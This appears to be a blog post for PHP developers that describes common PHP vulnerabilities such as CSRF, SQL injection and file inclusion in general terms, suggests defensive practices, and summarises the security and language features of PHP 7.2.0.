According to the latest reports, around 89% of websites are based on PHP making it incredibly popular across the globe. Not to mention that it is free and requires no licensing fee, so anyone (with some programming knowledge) can use it. When it comes to speaking about its features and advantages, I can simply go on and on. But that doesn’t mean it does not possess any kind of vulnerability. Hackers and bots will try to exploit these weaknesses and gain access to your website, so it’s important to first know what these are.
Some of the common PHP Vulnerabilities include
Cross-Site Request Forgery (CSRF) - This happens when a hacker manages to create a link and get someone with a privileged access (like an administrator) to click on this link. A typical CSRF attack is when this link manages to create a new “admin” user with an already existing password.
SQL Injection (SQLi) - SQL Injection, in general, occurs when the hacker sends his own instructions to your database and it executes them. The blame here usually falls on the PHP developer, who has not checked the input from a visitor for malicious code before passing it on to the database.
Authentication Bypass- There are times when developers mistakenly validate that a visitor has the proper access level. And this usually happens with the function “is_admin(). Where most of the developers think that user is the admin, when in fact, they are just viewing an admin page and are not an actual administrator. The result of this mistake is that non-admin users now have access to features only admins should be able to see.
Remote and Local File Inclusion (RFI and LFI) - Remote File Inclusion (RFI) and Local File Inclusion (LFI) are two more common PHP vulnerabilities. RFI is when a PHP application receives input such as an URL and passes it to a function designed to load a file. And Local File Inclusion (LFI) is when the attacker can get access to the wp-config.php file.
Well, as PHP web developer you will find numerous ways to defend Against Security Vulnerabilities, for example: testing the code as soon as you develop it, be consistent with your code and methods, front-end tests, unit testing, sanitization handlers, Database Handler Classes, Framework Usage and of course upgrading to PHP 7.2.0.
As the second feature update to the PHP 7 series, the PHP development team has come up with the release of 7.2.0. As expected, you will come across a wide range of improvement and features. Some of which include the ability to convert numeric keys in object/array casts, object typehint, counting of non-countable objects, and HasContext as Object. However, that’s not all! The latest version even improves TLS constants to sane values. The Mycrypt extension has been removed and new sodium extension has been added.
Released on November 30, the version offers a variety of security features such as:
• The Argon2 algorithm for securely hashing passwords addresses downsides of current algorithms in that it was designed for the highest memory filling rate. • The available Libsodium cryptography library, for authenticated encryption, is now a core extension. The library also offers high-speed elliptic cryptography. • SSL/TLS (Secure Sockets Layer/Transport Layer Security) constants have been improved. • The Mcrypt cryptography library extension has been removed. PHP’s developers have said Mcrypt has inhibited the growth of the PHP language and serves as “abandonware.”
Other improved programming features included were:
Conversion of numeric keys in object/array casts addresses an issue with the Zend Engine, which powers PHP 7. The engine has had cases where array hash tables can contain numeric strings while object hash tables can have integer keys. In such cases, PHP code can’t find the keys. With the fix in PHP 7.2, keys of arrays or object hash tables are converted as appropriate, so numeric string property names in objects become integer array keys and vice versa, solving the issue of inaccessible properties.
With the help of object type hints, one can easily fix a situation in which a developer can’t declare a function that needs to be passed an object as a parameter or declare that a function should return an object. The fix uses an object as a parameter type and as a return type.
HashContext as Object migrates the hash extension to use an object extension for hash contexts instead of using resources.
A new warning has been added when calling the count () function with a parameter that is a scalar, a parameter that is null, or an object that does not implement the Countable interface.
So that’s all for now! Keep watching the space to know more!